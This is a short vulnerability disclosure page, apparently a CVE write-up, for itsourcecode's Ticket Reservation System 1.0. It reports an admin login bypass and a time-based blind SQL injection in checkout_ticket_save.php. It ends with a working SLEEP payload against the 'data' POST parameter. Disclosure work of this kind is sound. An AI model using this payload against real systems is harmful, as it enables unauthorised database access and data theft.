Skip to content

Latest commit

 

History

History
27 lines (17 loc) · 726 Bytes

CVE10-2.md

File metadata and controls

27 lines (17 loc) · 726 Bytes
Raw

Vendor

itsourcecode

Product

Ticket Reservation System

version

1.0

Download Source Code: https://itsourcecode.com/wp-content/uploads/2020/09/qrcode.zip

Description

By exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "checkout_ticket_save.php" page due to the lack of strict filtering of the data parameter. image

Poc

Parameter: data (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: data=123' AND (SELECT 7295 FROM (SELECT(SLEEP(5)))zbyg) AND 'JWwh'='JWwh